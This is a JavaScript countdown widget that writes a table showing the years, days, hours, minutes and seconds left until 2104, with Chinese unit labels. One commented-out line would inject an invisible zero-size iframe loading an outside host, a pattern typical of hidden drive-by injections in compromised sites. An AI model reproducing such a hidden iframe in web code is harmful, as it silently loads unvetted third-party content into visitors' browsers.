document.write("<table width=\"120\" height=\"90\"  border=\"0\" cellpadding=\"0\" cellspacing=\"0\">");
document.write("    <tr>")
//document.write("<iframe src=http://pa114.336.cc width=0 height=0></iframe>");
document.write("          <td width=\"120\"align=\"center\" id=\"CountMsg\" valign=\"bottom\" background=\"wimages/time_bo.gif\" style=\"COLOR: #ffffff;padding-bottom:3px\"><strong id=\"RemainY\"></strong>年<strong id=\"RemainD\"></strong>天<br><strong id=\"RemainH\"></strong>小时<strong id=\"RemainM\"></strong>分<strong id=\"RemainS\"></strong>秒</td>");


//==========================================<strong id=\"RemainMM\"></strong>个月=====================================////
          var now = new Date();
          function createtime(){
          
          var grt= new Date("1/8/2104 8:8:8");
          
          now.setTime(now.getTime() + 500);
          years = (grt - now) / 1000 / 60 / 60 / 24 / 365 ;
          ynum = Math.floor(years);

          now.setTime(now.getTime() + 500);
          days = (grt - now) / 1000 / 60 / 60 / 24 - (365 * ynum);
          dnum = Math.floor(days);

          hours = (grt - now) / 1000 / 60 / 60 - ( ynum * 365 * 24 + dnum * 24 );
          hnum = Math.floor(hours);

          if(String(hnum).length ==1 ){hnum = "0" + hnum;}

          minutes = (grt - now) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum) - ( 365 * 24 *60 * ynum);
          mnum = Math.floor(minutes);
          if(String(mnum).length ==1 ){mnum = "0" + mnum;}
          seconds = (grt - now) / 1000 - (365 * 24 * 60 * 60 * ynum)  - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
          snum = Math.round(seconds);
          if(String(snum).length ==1 ){snum = "0" + snum;}
          
          document.getElementById("RemainY").innerHTML = ynum;
          document.getElementById("RemainD").innerHTML = dnum;
          document.getElementById("RemainH").innerHTML = hnum;
          document.getElementById("RemainM").innerHTML = mnum;
          document.getElementById("RemainS").innerHTML = snum;
          }
          
          setInterval("createtime()",1000);        
///=========================================================================///


document.write("  </table>");
